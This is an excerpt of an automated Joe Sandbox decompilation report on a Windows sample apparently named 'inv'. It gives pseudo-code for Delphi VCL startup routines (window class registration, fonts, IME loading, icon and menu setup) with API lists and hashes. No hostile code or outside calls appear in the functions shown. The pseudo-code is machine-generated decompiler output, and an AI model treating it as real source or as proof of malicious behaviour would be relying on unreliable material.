                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: NtdllProc_Window
                                  • String ID:
                                  • API String ID: 4255912815-0
                                  • Opcode ID: 86dcf55dc5099bfbdb52f651bed1b042a6fdd6890c02238dd2fa5d2fcae3f7cb
                                  • Instruction ID: f8f46fd7d8a48ab55b09033a5d1a75434b3a0307ace68058ee4c439b565e07c0
                                  • Opcode Fuzzy Hash: 86dcf55dc5099bfbdb52f651bed1b042a6fdd6890c02238dd2fa5d2fcae3f7cb
                                  • Instruction Fuzzy Hash: 11F0C579205608AFCB40DF9DC588D4AFBE8BB4C260B058195BD88CF322C234FD808F90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  C-Code - Quality: 85%
                                  			E00437098(void* __ebx, void* __edi, void* __eflags) {
                                  				char _v8;
                                  				char _v12;
                                  				char _v16;
                                  				char _v20;
                                  				char _v24;
                                  				long _v28;
                                  				char _v32;
                                  				char _v36;
                                  				intOrPtr _t25;
                                  				char _t29;
                                  				intOrPtr _t35;
                                  				intOrPtr _t38;
                                  				intOrPtr _t47;
                                  				intOrPtr _t49;
                                  				intOrPtr* _t50;
                                  				intOrPtr _t53;
                                  				struct HINSTANCE__* _t63;
                                  				intOrPtr* _t78;
                                  				intOrPtr* _t80;
                                  				intOrPtr _t83;
                                  				void* _t87;
                                  
                                  				_v20 = 0;
                                  				_v8 = 0;
                                  				_push(_t87);
                                  				_push(0x437210);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t87 + 0xffffffe0;
                                  				_v16 = GetCurrentProcessId();
                                  				_v12 = 0;
                                  				E004087F0("Delphi%.8X", 0,  &_v16,  &_v8);
                                  				E00403E64(0x44fb20, _v8);
                                  				_t25 =  *0x44fb20; // 0x2191290
                                  				 *0x44fb1c = GlobalAddAtomA(E004042D0(_t25));
                                  				_t29 =  *0x44f664; // 0x400000
                                  				_v36 = _t29;
                                  				_v32 = 0;
                                  				_v28 = GetCurrentThreadId();
                                  				_v24 = 0;
                                  				E004087F0("ControlOfs%.8X%.8X", 1,  &_v36,  &_v20);
                                  				E00403E64(0x44fb24, _v20);
                                  				_t35 =  *0x44fb24; // 0x21912ac
                                  				 *0x44fb1e = GlobalAddAtomA(E004042D0(_t35));
                                  				_t38 =  *0x44fb24; // 0x21912ac
                                  				 *0x44fb28 = RegisterClipboardFormatA(E004042D0(_t38));
                                  				 *0x44fb60 = E00413738(1);
                                  				E00436C9C();
                                  				 *0x44fb10 = E00436AC4(1, 1);
                                  				_t47 = E00448B2C(1, __edi);
                                  				_t78 =  *0x44e0ec; // 0x44fbb4
                                  				 *_t78 = _t47;
                                  				_t49 = E00449C10(0, 1);
                                  				_t80 =  *0x44dfb8; // 0x44fbb0
                                  				 *_t80 = _t49;
                                  				_t50 =  *0x44dfb8; // 0x44fbb0
                                  				E0044B778( *_t50, 1);
                                  				_t53 =  *0x426ef4; // 0x426ef8
                                  				E00412EEC(_t53, 0x428ff0, 0x429000);
                                  				_t63 = GetModuleHandleA("USER32");
                                  				if(_t63 != 0) {
                                  					 *0x44d9d0 = GetProcAddress(_t63, "AnimateWindow");
                                  				}
                                  				_pop(_t83);
                                  				 *[fs:eax] = _t83;
                                  				_push(0x437217);
                                  				E00403E10( &_v20);
                                  				return E00403E10( &_v8);
                                  			}

                                  APIs
                                  • GetCurrentProcessId.KERNEL32(?,00000000,00437210), ref: 004370B9
                                  • GlobalAddAtomA.KERNEL32 ref: 004370EC
                                  • GetCurrentThreadId.KERNEL32 ref: 00437107
                                  • GlobalAddAtomA.KERNEL32 ref: 0043713D
                                  • RegisterClipboardFormatA.USER32 ref: 00437153
                                    • Part of subcall function 00413738: RtlInitializeCriticalSection.KERNEL32(00411274,?,?,0041A201,00000000,0041A225), ref: 00413757
                                    • Part of subcall function 00436C9C: SetErrorMode.KERNEL32(00008000), ref: 00436CB5
                                    • Part of subcall function 00436C9C: GetModuleHandleA.KERNEL32(USER32,00000000,00436E02,?,00008000), ref: 00436CD9
                                    • Part of subcall function 00436C9C: GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 00436CE6
                                    • Part of subcall function 00436C9C: LoadLibraryA.KERNEL32(imm32.dll,00000000,00436E02,?,00008000), ref: 00436D02
                                    • Part of subcall function 00436C9C: GetProcAddress.KERNEL32(00000000,ImmGetContext), ref: 00436D24
                                    • Part of subcall function 00436C9C: GetProcAddress.KERNEL32(00000000,ImmReleaseContext), ref: 00436D39
                                    • Part of subcall function 00436C9C: GetProcAddress.KERNEL32(00000000,ImmGetConversionStatus), ref: 00436D4E
                                    • Part of subcall function 00436C9C: GetProcAddress.KERNEL32(00000000,ImmSetConversionStatus), ref: 00436D63
                                    • Part of subcall function 00436C9C: GetProcAddress.KERNEL32(00000000,ImmSetOpenStatus), ref: 00436D78
                                    • Part of subcall function 00436C9C: GetProcAddress.KERNEL32(00000000,ImmSetCompositionWindow), ref: 00436D8D
                                    • Part of subcall function 00436C9C: GetProcAddress.KERNEL32(00000000,ImmSetCompositionFontA), ref: 00436DA2
                                    • Part of subcall function 00436C9C: GetProcAddress.KERNEL32(00000000,ImmGetCompositionStringA), ref: 00436DB7
                                    • Part of subcall function 00436C9C: GetProcAddress.KERNEL32(00000000,ImmIsIME), ref: 00436DCC
                                    • Part of subcall function 00436C9C: GetProcAddress.KERNEL32(00000000,ImmNotifyIME), ref: 00436DE1
                                    • Part of subcall function 00436C9C: SetErrorMode.KERNEL32(?,00436E09,00008000), ref: 00436DFC
                                    • Part of subcall function 00448B2C: GetKeyboardLayout.USER32(00000000), ref: 00448B71
                                    • Part of subcall function 00448B2C: 72E7AC50.USER32(00000000,?,?,00000000,?,00437192,00000000,00000000,?,00000000,?,00000000,00437210), ref: 00448BC6
                                    • Part of subcall function 00448B2C: 72E7AD70.GDI32(00000000,0000005A,00000000,?,?,00000000,?,00437192,00000000,00000000,?,00000000,?,00000000,00437210), ref: 00448BD0
                                    • Part of subcall function 00448B2C: 72E7B380.USER32(00000000,00000000,00000000,0000005A,00000000,?,?,00000000,?,00437192,00000000,00000000,?,00000000,?,00000000), ref: 00448BDB
                                    • Part of subcall function 00449C10: LoadIconA.USER32(00400000,MAINICON), ref: 00449CF5
                                    • Part of subcall function 00449C10: GetModuleFileNameA.KERNEL32(00400000,?,00000100,?,?,?,004371A8,00000000,00000000,?,00000000,?,00000000,00437210), ref: 00449D27
                                    • Part of subcall function 00449C10: OemToCharA.USER32(?,?), ref: 00449D3A
                                    • Part of subcall function 00449C10: CharLowerA.USER32(?,00400000,?,00000100,?,?,?,004371A8,00000000,00000000,?,00000000,?,00000000,00437210), ref: 00449D7A
                                  • GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,00437210), ref: 004371D7
                                  • GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 004371E8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: AddressProc$Module$AtomCharCurrentErrorGlobalHandleLoadMode$B380ClipboardCriticalFileFormatIconInitializeKeyboardLayoutLibraryLowerNameProcessRegisterSectionThread
                                  • String ID: AnimateWindow$ControlOfs%.8X%.8X$Delphi%.8X$USER32
                                  • API String ID: 2159221912-1126952177
                                  • Opcode ID: 3657999068e5a9176a5cdcc0c49e48ce725bdc0498983a54a96d9f354a58f1aa
                                  • Instruction ID: fd9b2268af2c43c039bc95537116f8836b317f1e8a1384397f1a1c3436055077
                                  • Opcode Fuzzy Hash: 3657999068e5a9176a5cdcc0c49e48ce725bdc0498983a54a96d9f354a58f1aa
                                  • Instruction Fuzzy Hash: E8414274A046459BC700EFBAEC5294EB7E5EB4A348F51447EF400E73A2DB38A904CB9C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  C-Code - Quality: 42%
                                  			E00449F18(void* __eax, void* __ebx, void* __ecx) {
                                  				struct _WNDCLASSA _v44;
                                  				char _v48;
                                  				char* _t22;
                                  				long _t23;
                                  				CHAR* _t26;
                                  				struct HINSTANCE__* _t27;
                                  				intOrPtr* _t29;
                                  				signed int _t32;
                                  				intOrPtr* _t33;
                                  				signed int _t36;
                                  				struct HINSTANCE__* _t37;
                                  				void* _t39;
                                  				CHAR* _t40;
                                  				struct HWND__* _t41;
                                  				char* _t47;
                                  				char* _t52;
                                  				long _t55;
                                  				long _t59;
                                  				struct HINSTANCE__* _t62;
                                  				intOrPtr _t64;
                                  				void* _t69;
                                  				struct HMENU__* _t70;
                                  				intOrPtr _t77;
                                  				void* _t83;
                                  				short _t88;
                                  
                                  				_v48 = 0;
                                  				_t69 = __eax;
                                  				_push(_t83);
                                  				_push(0x44a0b9);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t83 + 0xffffffd4;
                                  				if( *((char*)(__eax + 0xa4)) != 0) {
                                  					L13:
                                  					_pop(_t77);
                                  					 *[fs:eax] = _t77;
                                  					_push(0x44a0c0);
                                  					return E00403E10( &_v48);
                                  				}
                                  				_t22 =  *0x44e014; // 0x44f048
                                  				if( *_t22 != 0) {
                                  					goto L13;
                                  				}
                                  				_t23 = E00419F54(E0044A498, __eax); // executed
                                  				 *(_t69 + 0x40) = _t23;
                                  				 *0x44dd08 = L004061D0;
                                  				_t26 =  *0x44dd28; // 0x449c00
                                  				_t27 =  *0x44f664; // 0x400000
                                  				if(GetClassInfoA(_t27, _t26,  &_v44) == 0) {
                                  					_t62 =  *0x44f664; // 0x400000
                                  					 *0x44dd14 = _t62;
                                  					_t88 = RegisterClassA(0x44dd04);
                                  					if(_t88 == 0) {
                                  						_t64 =  *0x44ddc8; // 0x41a290
                                  						E00405910(_t64,  &_v48);
                                  						E0040B070(_v48, 1);
                                  						E0040384C();
                                  					}
                                  				}
                                  				_t29 =  *0x44de70; // 0x44f8f8
                                  				_t32 =  *((intOrPtr*)( *_t29))(0) >> 1;
                                  				if(_t88 < 0) {
                                  					asm("adc eax, 0x0");
                                  				}
                                  				_t33 =  *0x44de70; // 0x44f8f8
                                  				_t36 =  *((intOrPtr*)( *_t33))(1, _t32) >> 1;
                                  				if(_t88 < 0) {
                                  					asm("adc eax, 0x0");
                                  				}
                                  				_push(_t36);
                                  				_push(0);
                                  				_push(0);
                                  				_push(0);
                                  				_push(0);
                                  				_t37 =  *0x44f664; // 0x400000
                                  				_push(_t37);
                                  				_push(0);
                                  				_t7 = _t69 + 0x8c; // 0x1eec0044
                                  				_t39 = E004042D0( *_t7);
                                  				_t40 =  *0x44dd28; // 0x449c00, executed
                                  				_t41 = E00406728(_t40, _t39); // executed
                                  				 *(_t69 + 0x30) = _t41;
                                  				_t9 = _t69 + 0x8c; // 0x44208c
                                  				E00403E10(_t9);
                                  				 *((char*)(_t69 + 0xa4)) = 1;
                                  				_t11 = _t69 + 0x40; // 0x10940000
                                  				_t12 = _t69 + 0x30; // 0xe
                                  				SetWindowLongA( *_t12, 0xfffffffc,  *_t11);
                                  				_t47 =  *0x44dee4; // 0x44fb14
                                  				if( *_t47 != 0) {
                                  					_t55 = E0044AB9C(_t69);
                                  					_t13 = _t69 + 0x30; // 0xe
                                  					SendMessageA( *_t13, 0x80, 1, _t55); // executed
                                  					_t59 = E0044AB9C(_t69);
                                  					_t14 = _t69 + 0x30; // 0xe
                                  					SetClassLongA( *_t14, 0xfffffff2, _t59); // executed
                                  				}
                                  				_t15 = _t69 + 0x30; // 0xe
                                  				_t70 = GetSystemMenu( *_t15, "true");
                                  				DeleteMenu(_t70, 0xf030, 0);
                                  				DeleteMenu(_t70, 0xf000, 0);
                                  				_t52 =  *0x44dee4; // 0x44fb14
                                  				if( *_t52 != 0) {
                                  					DeleteMenu(_t70, 0xf010, 0);
                                  				}
                                  				goto L13;
                                  			}

                                  APIs
                                    • Part of subcall function 00419F54: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 00419F72
                                  • GetClassInfoA.USER32 ref: 00449F77
                                  • RegisterClassA.USER32 ref: 00449F8F
                                    • Part of subcall function 00405910: LoadStringA.USER32 ref: 00405941
                                  • SetWindowLongA.USER32 ref: 0044A02B
                                  • SendMessageA.USER32(0000000E,00000080,00000001,00000000), ref: 0044A04D
                                  • SetClassLongA.USER32(0000000E,000000F2,00000000,0000000E,00000080,00000001,00000000,0000000E,000000FC,10940000,00442000), ref: 0044A060
                                  • GetSystemMenu.USER32(0000000E,00000000,0000000E,000000FC,10940000,00442000), ref: 0044A06B
                                  • DeleteMenu.USER32(00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,00442000), ref: 0044A07A
                                  • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,00442000), ref: 0044A087
                                  • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,0000000E,00000000,0000000E,000000FC,10940000,00442000), ref: 0044A09E
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: Menu$ClassDelete$Long$AllocInfoLoadMessageRegisterSendStringSystemVirtualWindow
                                  • String ID:
                                  • API String ID: 2103932818-0
                                  • Opcode ID: eb6d24ecf55c4227565050ea5637d0d09927b92954369b9857cef46955736244
                                  • Instruction ID: baf1d1b52cd809640e557e6153a66deda530f32a29d7c12e5c3fb2665838f6dc
                                  • Opcode Fuzzy Hash: eb6d24ecf55c4227565050ea5637d0d09927b92954369b9857cef46955736244
                                  • Instruction Fuzzy Hash: 97419274B402006FF710EF69DC82F6A37A8AB56704F544476F900EF2E2D6B9AC10876D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  C-Code - Quality: 89%
                                  			E00449308(void* __eax, void* __ebx, void* __ecx, void* __edi) {
                                  				char _v5;
                                  				struct tagLOGFONTA _v65;
                                  				struct tagLOGFONTA _v185;
                                  				struct tagLOGFONTA _v245;
                                  				void _v405;
                                  				void* _t23;
                                  				int _t27;
                                  				void* _t30;
                                  				intOrPtr _t38;
                                  				struct HFONT__* _t41;
                                  				struct HFONT__* _t45;
                                  				struct HFONT__* _t49;
                                  				intOrPtr _t52;
                                  				intOrPtr _t54;
                                  				void* _t57;
                                  				void* _t72;
                                  				void* _t74;
                                  				void* _t75;
                                  				intOrPtr _t76;
                                  
                                  				_t72 = __edi;
                                  				_t74 = _t75;
                                  				_t76 = _t75 + 0xfffffe6c;
                                  				_t57 = __eax;
                                  				_v5 = 0;
                                  				if( *0x44fbb0 != 0) {
                                  					_t54 =  *0x44fbb0; // 0x2191714
                                  					_v5 =  *((intOrPtr*)(_t54 + 0x88));
                                  				}
                                  				_push(_t74);
                                  				_push(0x44944d);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t76;
                                  				if( *0x44fbb0 != 0) {
                                  					_t52 =  *0x44fbb0; // 0x2191714
                                  					E0044B778(_t52, 0);
                                  				}
                                  				if(SystemParametersInfoA(0x1f, 0x3c,  &_v65, 0) == 0) {
                                  					_t23 = GetStockObject(0xd);
                                  					_t7 = _t57 + 0x84; // 0x38004010
                                  					E0041C0BC( *_t7, _t23, _t72);
                                  				} else {
                                  					_t49 = CreateFontIndirectA( &_v65); // executed
                                  					_t6 = _t57 + 0x84; // 0x38004010
                                  					E0041C0BC( *_t6, _t49, _t72);
                                  				}
                                  				_v405 = 0x154;
                                  				_t27 = SystemParametersInfoA(0x29, 0,  &_v405, 0); // executed
                                  				if(_t27 == 0) {
                                  					_t14 = _t57 + 0x80; // 0x94000000
                                  					E0041C1A0( *_t14, 8);
                                  					_t30 = GetStockObject(0xd);
                                  					_t15 = _t57 + 0x88; // 0x90000000
                                  					E0041C0BC( *_t15, _t30, _t72);
                                  				} else {
                                  					_t41 = CreateFontIndirectA( &_v185);
                                  					_t11 = _t57 + 0x80; // 0x94000000
                                  					E0041C0BC( *_t11, _t41, _t72);
                                  					_t45 = CreateFontIndirectA( &_v245);
                                  					_t13 = _t57 + 0x88; // 0x90000000
                                  					E0041C0BC( *_t13, _t45, _t72);
                                  				}
                                  				_t16 = _t57 + 0x80; // 0x94000000
                                  				E0041BF00( *_t16, 0xff000017);
                                  				_t17 = _t57 + 0x88; // 0x90000000
                                  				E0041BF00( *_t17, 0xff000007);
                                  				 *[fs:eax] = 0xff000007;
                                  				_push(0x449454);
                                  				if( *0x44fbb0 != 0) {
                                  					_t38 =  *0x44fbb0; // 0x2191714
                                  					return E0044B778(_t38, _v5);
                                  				}
                                  				return 0;
                                  			}

                                  APIs
                                  • SystemParametersInfoA.USER32(0000001F,0000003C,?,00000000), ref: 0044935C
                                  • CreateFontIndirectA.GDI32(?), ref: 00449369
                                  • GetStockObject.GDI32(0000000D), ref: 0044937F
                                    • Part of subcall function 0041C1A0: MulDiv.KERNEL32(00000000,?,00000048), ref: 0041C1AD
                                  • SystemParametersInfoA.USER32(00000029,00000000,00000154,00000000), ref: 004493A8
                                  • CreateFontIndirectA.GDI32(?), ref: 004493B8
                                  • CreateFontIndirectA.GDI32(?), ref: 004493D1
                                  • GetStockObject.GDI32(0000000D), ref: 004493F7
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: CreateFontIndirect$InfoObjectParametersStockSystem
                                  • String ID:
                                  • API String ID: 2891467149-0
                                  • Opcode ID: 73e832a2b2fa7d19b0e00d71a02846332b615da9f9dac6651429aae989212ca0
                                  • Instruction ID: ad277987319bc6f5eba6e6121e29579943c1d28b0af3c7a9d09895272ff55ce0
                                  • Opcode Fuzzy Hash: 73e832a2b2fa7d19b0e00d71a02846332b615da9f9dac6651429aae989212ca0
                                  • Instruction Fuzzy Hash: EF31C834644644DBEB50EBA5CC92B9A37A4EB49304F4440B7F908DB296DF789C49C72D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  C-Code - Quality: 94%
                                  			E00449C10(void* __ecx, char __edx) {
                                  				char _v5;
                                  				char _v261;
                                  				void* __ebx;
                                  				void* __ebp;
                                  				intOrPtr _t39;
                                  				intOrPtr _t42;
                                  				intOrPtr _t43;
                                  				struct HINSTANCE__** _t53;
                                  				struct HICON__* _t55;
                                  				intOrPtr _t58;
                                  				struct HINSTANCE__** _t60;
                                  				void* _t67;
                                  				char* _t69;
                                  				char* _t75;
                                  				intOrPtr _t81;
                                  				intOrPtr* _t88;
                                  				intOrPtr* _t89;
                                  				intOrPtr _t90;
                                  				void* _t91;
                                  				char _t93;
                                  				void* _t104;
                                  				void* _t105;
                                  
                                  				_t93 = __edx;
                                  				_t91 = __ecx;
                                  				if(__edx != 0) {
                                  					_t105 = _t105 + 0xfffffff0;
                                  					_t39 = E004033E4(_t39, _t104);
                                  				}
                                  				_v5 = _t93;
                                  				_t90 = _t39;
                                  				E00418EC4(_t91, 0);
                                  				_t42 =  *0x44df2c; // 0x44d3c4
                                  				if( *((short*)(_t42 + 2)) == 0) {
                                  					_t89 =  *0x44df2c; // 0x44d3c4
                                  					 *((intOrPtr*)(_t89 + 4)) = _t90;
                                  					 *_t89 = 0x44b268;
                                  				}
                                  				_t43 =  *0x44dfd4; // 0x44d3cc
                                  				if( *((short*)(_t43 + 2)) == 0) {
                                  					_t88 =  *0x44dfd4; // 0x44d3cc
                                  					 *((intOrPtr*)(_t88 + 4)) = _t90;
                                  					 *_t88 = E0044B460;
                                  				}
                                  				 *((char*)(_t90 + 0x34)) = 0;
                                  				 *((intOrPtr*)(_t90 + 0x90)) = E004030A8(1);
                                  				 *((intOrPtr*)(_t90 + 0xa8)) = E004030A8(1);
                                  				 *((intOrPtr*)(_t90 + 0x60)) = 0;
                                  				 *((intOrPtr*)(_t90 + 0x84)) = 0;
                                  				 *((intOrPtr*)(_t90 + 0x5c)) = 0xff000018;
                                  				 *((intOrPtr*)(_t90 + 0x78)) = 0x1f4;
                                  				 *((char*)(_t90 + 0x7c)) = 1;
                                  				 *((intOrPtr*)(_t90 + 0x80)) = 0;
                                  				 *((intOrPtr*)(_t90 + 0x74)) = 0x9c4;
                                  				 *((char*)(_t90 + 0x88)) = 0;
                                  				 *((char*)(_t90 + 0x9d)) = 1;
                                  				 *((char*)(_t90 + 0xb4)) = 1;
                                  				_t103 = E00420CE0(1);
                                  				 *((intOrPtr*)(_t90 + 0x98)) = _t52;
                                  				_t53 =  *0x44de54; // 0x44f02c
                                  				_t55 = LoadIconA( *_t53, "MAINICON"); // executed
                                  				E004210B0(_t103, _t55);
                                  				_t20 = _t90 + 0x98; // 0x736d
                                  				_t58 =  *_t20;
                                  				 *((intOrPtr*)(_t58 + 0x14)) = _t90;
                                  				 *((intOrPtr*)(_t58 + 0x10)) = 0x44ba00;
                                  				_t60 =  *0x44de54; // 0x44f02c
                                  				GetModuleFileNameA( *_t60,  &_v261, 0x100);
                                  				OemToCharA( &_v261,  &_v261);
                                  				_t67 = E0040BDAC(0x5c);
                                  				if(_t67 != 0) {
                                  					_t27 = _t67 + 1; // 0x1
                                  					E00408164( &_v261, _t27);
                                  				}
                                  				_t69 = E0040BDD4( &_v261, 0x2e);
                                  				if(_t69 != 0) {
                                  					 *_t69 = 0;
                                  				}
                                  				CharLowerA( &(( &_v261)[1]));
                                  				_t31 = _t90 + 0x8c; // 0x44208c
                                  				E00404080(_t31, 0x100,  &_v261);
                                  				_t75 =  *0x44dd58; // 0x44f034
                                  				if( *_t75 == 0) {
                                  					E00449F18(_t90, _t90, 0x100); // executed
                                  				}
                                  				 *((char*)(_t90 + 0x59)) = 1;
                                  				 *((char*)(_t90 + 0x5a)) = 1;
                                  				 *((char*)(_t90 + 0x5b)) = 1;
                                  				 *((char*)(_t90 + 0x9e)) = 1;
                                  				 *((intOrPtr*)(_t90 + 0xa0)) = 0;
                                  				E0044BBDC(_t90, 0x100);
                                  				E0044C5A0(_t90);
                                  				_t81 = _t90;
                                  				if(_v5 != 0) {
                                  					E0040343C(_t81);
                                  					_pop( *[fs:0x0]);
                                  				}
                                  				return _t90;
                                  			}

                                  APIs
                                  • LoadIconA.USER32(00400000,MAINICON), ref: 00449CF5
                                  • GetModuleFileNameA.KERNEL32(00400000,?,00000100,?,?,?,004371A8,00000000,00000000,?,00000000,?,00000000,00437210), ref: 00449D27
                                  • OemToCharA.USER32(?,?), ref: 00449D3A
                                  • CharLowerA.USER32(?,00400000,?,00000100,?,?,?,004371A8,00000000,00000000,?,00000000,?,00000000,00437210), ref: 00449D7A
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.791817245.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000D.00000002.791789849.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 0000000D.00000002.792119817.000000000044D000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792140964.000000000044E000.00000008.00020000.sdmp
                                  • Associated: 0000000D.00000002.792157690.000000000044F000.00000004.00020000.sdmp
                                  • Associated: 0000000D.00000002.792184748.0000000000454000.00000002.00020000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_400000_inv.jbxd
                                  Similarity
                                  • API ID: Char$FileIconLoadLowerModuleName
                                  • String ID: MAINICON
                                  • API String ID: 3935243913-2283262055
                                  • Opcode ID: 749e5935ece9b9ca536fad64a292b6f04e7e3b732791706d472bf17567022dd7
                                  • Instruction ID: 7762ded3d26ada70a0d4ae2ed5f62854948f82d4012a9fa2ad6908d08bb40e5d
                                  • Opcode Fuzzy Hash: 749e5935ece9b9ca536fad64a292b6f04e7e3b732791706d472bf17567022dd7
                                  • Instruction Fuzzy Hash: C2512070A042449FD750DF39C8C5B867BE4AB15308F4480BAE848DF397D7BE9948CB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  C-Code - Quality: 84%
                                  			E00448B2C(char __edx, void* __edi) {
                                  				char _v5;
                                  				void* __ebx;
                                  				void* __ecx;
                                  				void* __ebp;
                                  				intOrPtr _t25;
                                  				intOrPtr* _t28;
                                  				intOrPtr* _t29;
                                  				intOrPtr _t42;
                                  				intOrPtr* _t45;
                                  				intOrPtr _t56;
                                  				intOrPtr _t57;
                                  				intOrPtr _t58;
                                  				intOrPtr _t59;
                                  				intOrPtr _t62;
                                  				void* _t63;
                                  				char _t64;
                                  				void* _t74;
                                  				intOrPtr _t75;
                                  				void* _t76;
                                  				void* _t77;
                                  
                                  				_t74 = __edi;
                                  				_t64 = __edx;
                                  				if(__edx != 0) {
                                  					_t77 = _t77 + 0xfffffff0;
                                  					_t25 = E004033E4(_t25, _t76);
                                  				}
                                  				_v5 = _t64;
                                  				_t62 = _t25;
                                  				E00418EC4(_t63, 0);
                                  				_t28 =  *0x44ddf4; // 0x44d3b4
                                  				 *((intOrPtr*)(_t28 + 4)) = _t62;
                                  				 *_t28 = 0x448ed0;
                                  				_t29 =  *0x44de00; // 0x44d3bc
                                  				 *((intOrPtr*)(_t29 + 4)) = _t62;
                                  				 *_t29 = 0x448edc;
                                  				E00448EE8(_t62);
                                  				 *((intOrPtr*)(_t62 + 0x3c)) = GetKeyboardLayout(0);
                                  				 *((intOrPtr*)(_t62 + 0x4c)) = E004030A8(1);
                                  				 *((intOrPtr*)(_t62 + 0x50)) = E004030A8(1);
                                  				 *((intOrPtr*)(_t62 + 0x54)) = E004030A8(1);
                                  				 *((intOrPtr*)(_t62 + 0x58)) = E004030A8(1);
                                  				_t42 = E004030A8(1);
                                  				 *((intOrPtr*)(_t62 + 0x7c)) = _t42;
                                  				L004062C0();
                                  				_t75 = _t42;
                                  				L00406058();
                                  				 *((intOrPtr*)(_t62 + 0x40)) = _t42;
                                  				L004064F8();
                                  				_t11 = _t62 + 0x58; // 0x441f286e
                                  				_t45 =  *0x44df40; // 0x44f914
                                  				 *((intOrPtr*)( *_t45))(0, 0, E00445304,  *_t11, 0, _t75, _t75, 0x5a, 0);
                                  				 *((intOrPtr*)(_t62 + 0x84)) = E0041BD2C(1);
                                  				 *((intOrPtr*)(_t62 + 0x88)) = E0041BD2C(1);
                                  				 *((intOrPtr*)(_t62 + 0x80)) = E0041BD2C(1);
                                  				E00449308(_t62, _t62, _t63, _t74);
                                  				_t15 = _t62 + 0x84; // 0x38004010
                                  				_t56 =  *_t15;
                                  				 *((intOrPtr*)(_t56 + 0xc)) = _t62;
                                  				 *((intOrPtr*)(_t56 + 8)) = 0x4491e4;
                                  				_t18 = _t62 + 0x88; // 0x90000000
                                  				_t57 =  *_t18;
                                  				 *((intOrPtr*)(_t57 + 0xc)) = _t62;
                                  				 *((intOrPtr*)(_t57 + 8)) = 0x4491e4;
                                  				_t21 = _t62 + 0x80; // 0x94000000
                                  				_t58 =  *_t21;
                                  				 *((intOrPtr*)(_t58 + 0xc)) = _t62;
                                  				 *((intOrPtr*)(_t58 + 8)) = 0x4491e4;
                                  				_t59 = _t62;
                                  				if(_v5 != 0) {
                                  					E0040343C(_t59);
                                  					_pop( *[fs:0x0]);
                                  				}
                                  				return _t62;
                                  			}

                                  APIs
                                  • GetKeyboardLayout.USER32(00000000), ref: 00448B71
                                  • 72E7AC50.USER32(00000000,?,?,00000000,?,00437192,00000000,00000000,?,00000000,?,00000000,00437210), ref: 00448BC6
                                  • 72E7AD70.GDI32(00000000,0000005A,00000000,?,?,00000000,?,00437192,00000000,00000000,?,00000000,?,00000000,00437210), ref: 00448BD0
